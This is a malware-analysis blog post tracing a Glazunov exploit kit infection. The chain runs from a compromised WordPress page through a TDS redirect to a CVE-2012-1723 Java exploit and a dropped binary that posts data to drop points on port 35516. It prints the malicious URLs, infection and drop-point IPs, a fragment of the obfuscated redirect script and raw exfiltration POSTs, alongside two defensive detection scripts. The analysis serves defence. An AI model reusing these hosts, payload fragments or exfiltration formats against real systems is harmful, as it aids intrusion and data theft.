According to Emerging Threats, this is the Glazunov exploit kit.
This particular case is an excellent example to demonstrate that malware authors do their best to avoid detection and do not play by the internet rules. The utilization of defense in depth is a critical component to any information security program and would assist in limiting the damage from an attack of this nature.
This example shows:
- A compromised site/malicious site which is, for the better part, unrecognized.
- A redirect to HTTP on TCP port 8080, direct to an IP address
- Content delivery which appears innocuous in URL logs.
- Java exploits which are not detected by virtually any AV
- Malware which is not detected
- Exfiltration of data on high ports, showing as only TCP connections
- Utilizing other people's IP addresses as drop points
This was achieved because of the following gaps in security:
- Endpoint did not have updated Java version and was vulnerable
- Web filtering did not block direct to IP requests
- Layer 7 filtering was not performed at the perimeter (IPS) for the exploit code.
- AV did not detect the malware
- Outbound ports were not restricted. The endpoint could communicate outbound.
The entry point is a 301 redirect; however, the content length is a28 and the 301 response contains what AVG recognizes as a Blackhole redirect.
hxxp://www.helloooooo.com/2009/01/splinter-impostor-claims-worlds-longest-hair/
This is a dangerous website and should not be visited in a browser.
The next step is for me to get the redirect URL.
GET /2009/01/splinter-impostor-claims-worlds-longest-hair/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.helloooooo.com
Connection: Keep-Alive
And gives me a gift... to quote my friend Tarun.
HTTP/1.1 200 OK
Date: Tue, 27 Nov 2012 00:10:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Pingback: http://www.helloooooo.com/xmlrpc.php
Link: <http://www.helloooooo.com/?p=1892>; rel=shortlink
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
5244
<script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];
The redirect is to rigo6680.zapto.org/?go=2, which is consistent with TDS (traffic distribution system) redirects.
http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b
Additional redirects appear everywhere on the page, see the CSS redirect below.
Redirect from a CSS file.
http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725
What happens next?
The following URL chain occurs. It includes an embedded YouTube video (the 74.125.x.y IP addresses).
609 31.956187 10.1.2.3 -> 74.125.236.9 HTTP 408 GET /v/hYaYCPmFWKw&hl=en&fs=1 HTTP/1.1
613 32.126215 10.1.2.3 -> 65.163.12.222 HTTP 454 GET /wp-content/themes/twentyten/images/wordpress.png HTTP/1.1
616 32.196442 65.163.12.222 -> 10.1.2.3 HTTP 1152 HTTP/1.1 200 OK (PNG)
625 32.545505 74.125.236.9 -> 10.1.2.3 HTTP 674 HTTP/1.1 200 OK (application/x-shockwave-flash)
637 33.374071 10.1.2.3 -> 64.34.183.111 HTTP 335 GET /2354796716/12230 HTTP/1.1
673 33.543459 10.1.2.3 -> 74.125.236.1 HTTP 382 GET /yts/swfbin/watch_as3-vfl1ubMZd.swf HTTP/1.1
688 33.587050 64.34.183.111 -> 10.1.2.3 HTTP 104 HTTP/1.1 200 OK (application/x-java-archive)
695 33.626438 10.1.2.3 -> 64.34.183.111 HTTP 292 GET /2354796716/12230 HTTP/1.1
744 33.867125 64.34.183.111 -> 10.1.2.3 HTTP 104 HTTP/1.1 200 OK (application/x-java-archive)
770 34.193535 10.1.2.3 -> 64.34.183.111 HTTP 245 GET /15692 HTTP/1.1
931 34.501338 64.34.183.111 -> 10.1.2.3 HTTP/DL 958 unknown (0x4d)
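The gaps listed earlier (direct-to-IP requests, unfiltered non-standard ports, no Layer 7 inspection of the exploit content) and the URL chain above are the kind of thing a proxy or flow log can score without any signature for the kit itself. The script below is an added example, not the post's or the kit's code: it models proxy-style records in the shape of that chain, flags the individual indicators (bare-IP Host header, port 8080, a JAR from a host outside an allow-list, a response beginning with the PE magic bytes under a mismatched Content-Type), and then correlates a JAR download followed by a PE from the same server to the same client. The 64.34.183.111:8080 server, the paths and the host names come from the post; the 203.0.113.x addresses are TEST-NET placeholders the post does not give, and TRUSTED_JAR_HOSTS is a hypothetical allow-list.

```python
"""Score proxy-style HTTP records for the chain the post describes (added
example, not the post's or the kit's code). Records are a constructed shape;
host names, the 64.34.183.111:8080 server and the paths come from the post,
the addresses marked TEST-NET are placeholders the post does not give."""
import ipaddress
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Transaction:
    ts: float           # seconds since start of capture
    client: str
    server_ip: str
    server_port: int
    host_header: str    # Host: header value, port stripped
    path: str
    content_type: str   # response Content-Type ("" if the server sent none)
    body_head: bytes    # first bytes of the response body


# Constructed records mirroring the URL chain in the post.
SAMPLE = [
    Transaction(0.0, "10.1.2.3", "203.0.113.5", 80, "www.helloooooo.com",   # TEST-NET placeholder
                "/2009/01/splinter-impostor-claims-worlds-longest-hair/",
                "text/html", b"<!DOCTYPE"),
    Transaction(1.2, "10.1.2.3", "203.0.113.9", 80, "rigo6680.zapto.org",   # TEST-NET placeholder
                "/?go=2", "text/html", b"<html>"),
    Transaction(33.4, "10.1.2.3", "64.34.183.111", 8080, "64.34.183.111",
                "/2354796716/12230", "application/x-java-archive", b"PK\x03\x04"),
    Transaction(34.5, "10.1.2.3", "64.34.183.111", 8080, "64.34.183.111",
                "/15692", "", b"MZ\x90\x00"),
]

STANDARD_PORTS = {80, 443}
TRUSTED_JAR_HOSTS = {"java.example.com"}   # hypothetical allow-list of JAR origins
PE_CONTENT_TYPES = {"application/x-msdownload", "application/octet-stream"}


def is_literal_ip(host: str) -> bool:
    """True when the Host header is a bare IP rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score(tx: Transaction) -> List[str]:
    """Return the indicators that fire for one transaction (empty = nothing odd)."""
    reasons = []
    if is_literal_ip(tx.host_header):
        reasons.append("direct-to-ip")
    if tx.server_port not in STANDARD_PORTS:
        reasons.append(f"nonstandard-port:{tx.server_port}")
    if (tx.content_type == "application/x-java-archive"
            and tx.host_header not in TRUSTED_JAR_HOSTS):
        reasons.append("jar-from-unlisted-host")
    # 0x4d 0x5a ("MZ") is the PE header; the post's last response was 'unknown (0x4d)'
    if tx.body_head.startswith(b"MZ") and tx.content_type not in PE_CONTENT_TYPES:
        reasons.append("pe-with-mismatched-content-type")
    return reasons


def find_chains(txs: List[Transaction], window: float = 60.0) -> List[Tuple[str, str, str, str]]:
    """JAR download followed, within `window` seconds, by a PE from the same
    server to the same client: the applet-then-dropper sequence seen above."""
    alerts = []
    by_client = {}
    for tx in sorted(txs, key=lambda t: t.ts):
        by_client.setdefault(tx.client, []).append(tx)
    for client, seq in by_client.items():
        for i, jar in enumerate(seq):
            if jar.content_type != "application/x-java-archive":
                continue
            for later in seq[i + 1:]:
                if later.ts - jar.ts > window:
                    break
                if later.server_ip == jar.server_ip and later.body_head.startswith(b"MZ"):
                    alerts.append((client, jar.server_ip, jar.path, later.path))
    return alerts


if __name__ == "__main__":
    for tx in SAMPLE:
        print(f"{tx.host_header}:{tx.server_port}{tx.path} -> {score(tx) or 'clean'}")
    for client, server, jar_path, pe_path in find_chains(SAMPLE):
        print(f"ALERT {client}: {jar_path} then {pe_path} from {server}")
```

The per-record indicators alone would each produce noise on a busy network (plenty of legitimate traffic runs on 8080), which is why the chain rule in find_chains is the one worth alerting on: a JAR followed within a minute by an unlabeled PE from the same server is exactly the applet-then-dropper pattern, and it needs no knowledge of the exploit or the AV-evading binary.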
Here's the Java.
We run the Java applet, which carries an exploit for CVE-2012-1723; the binary materializes and is executed immediately.
Posting Data to Drop Points
What we get are connections on TCP port 35516 posting data to compromised Windows servers online.
What is interesting is that this traffic is not recognized as HTTP: it shows up only as a TCP connection to outbound port 35516, which would fly under the radar of many detection mechanisms.
This infection is a wonderful case study in an infection chain using difficult to detect methods and exploiting weaknesses in infrastructure, perimeter security and vulnerable workstation software.
Four IP addresses were drop points:
131.96.243.22
74.59.207.114
68.197.117.117
87.203.78.137
The infection point is 64.34.183.111:8080
Here is what the Posting looks like.
VirusTotal result for the JAR file (CVE-2012-1723): 2/46 detections.
https://www.virustotal.com/file/4f88dd9dbeaba9a59ab1c077b4e98be72c66e59f79ad8cc95c0952530ca698f3/analysis/1354328781/
ed-309-aaenak.gsu.edu
Raw POST information
POST /nymain/nm1932719/index.php HTTP/1.1
Host: 131.96.243.22
Content-Length: 54
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
filename=bphgt.ntz&data=œT¬»ñOõ[!5a9±r8ÆàSÞ¼ƒAôˆPöêÙ
HTTP/1.1 200 OK
Content-Length: 4
Connection: close
[
------------------------------------------------------------------
POST /nymain/nm1932719/index.php HTTP/1.1
Host: 74.59.207.114
Content-Length: 58
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
filename=skjlrke.kcf&data=¾¤±ß]NçWB\—%~}SóCå£tZ‡£¬4Ø–‘
videotron.ca (1)
Host: modemcable114.207-59-74.mc.videotron.ca
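Because the beacon goes to port 35516, protocol detection in many sensors never runs the HTTP dissector on it, so the POSTs above are logged as bare TCP. The following script is an added example, not the post's tooling: it takes one raw outbound payload and a destination port, parses it as an HTTP request only if it is shaped like one, and scores the pattern the post shows (HTTP on a non-web port, a form upload with filename= and data= fields, and a data field of high-entropy non-printable bytes). The payload is constructed to mirror the first raw POST in the post; the bytes after data= are filler chosen here, not the real captured content.

```python
"""Classify one outbound TCP payload captured on a high port (added example,
not the post's tooling). The payload is constructed to match the shape of the
raw POST in the post; the bytes after data= are filler chosen here, not the
real captured content."""
import math
from collections import Counter
from typing import Dict, Optional

SAMPLE_PAYLOAD = (
    b"POST /nymain/nm1932719/index.php HTTP/1.1\r\n"
    b"Host: 131.96.243.22\r\n"
    b"Content-Length: 54\r\n"
    b"Accept-Encoding: deflate\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)\r\n"
    b"Pragma: no-cache\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"filename=bphgt.ntz&data=" + bytes(range(0x80, 0x9e))   # 24 + 30 = 54 bytes, constructed filler
)

WEB_PORTS = {80, 443, 8080}   # ports where plain HTTP is expected on this network


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 is the maximum; encrypted or compressed data approaches it."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_http_request(payload: bytes) -> Optional[Dict]:
    """Minimal request parser: None unless the payload starts like an HTTP request."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.decode("latin-1").strip().lower()] = value.decode("latin-1").strip()
    return {"method": parts[0].decode("latin-1"), "path": parts[1].decode("latin-1"),
            "headers": headers, "body": body}


def parse_form(body: bytes) -> Dict[str, bytes]:
    """Split a form body; everything after 'data=' is kept as raw bytes because
    the post's sample carries un-encoded binary there (it may contain & or =)."""
    fields = {}
    prefix, sep, rest = body.partition(b"data=")
    for pair in prefix.split(b"&"):
        if pair:
            name, _, value = pair.partition(b"=")
            fields[name.decode("latin-1")] = value
    if sep:
        fields["data"] = rest
    return fields


def classify(payload: bytes, dst_port: int) -> Dict:
    """Verdict plus the reasons for it; 'not-http' when the payload is not a request."""
    req = parse_http_request(payload)
    if req is None:
        return {"verdict": "not-http", "reasons": []}
    reasons = []
    if dst_port not in WEB_PORTS:
        reasons.append(f"http-on-nonstandard-port:{dst_port}")
    if req["method"] == "POST":
        fields = parse_form(req["body"])
        if "filename" in fields and "data" in fields:
            reasons.append("filename+data-form-upload")
        data = fields.get("data", b"")
        if data:
            ent = shannon_entropy(data)
            nonprint = sum(1 for b in data if b < 0x20 or b > 0x7e) / len(data)
            if ent > 4.5 and nonprint > 0.5:
                reasons.append(f"opaque-data-field:entropy={ent:.2f}")
    verdict = "likely-exfil" if len(reasons) >= 2 else ("suspicious" if reasons else "benign")
    return {"verdict": verdict, "reasons": reasons,
            "host": req["headers"].get("host", ""), "path": req["path"]}


if __name__ == "__main__":
    print(classify(SAMPLE_PAYLOAD, 35516))
```

Running it on the constructed payload yields likely-exfil with all three reasons; the same POST sent to port 80 would still be marked suspicious on the form-field and entropy indicators alone. The practical point for the perimeter is that none of this logic fires unless the sensor hands non-web-port traffic to an HTTP parser at all, which is the gap the post's egress-filtering finding describes.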
@fknsec
All investigations were performed in my personal lab. This article's content and any opinions expressed are not the opinions of any past, present or future employer. Lawyers are our friends.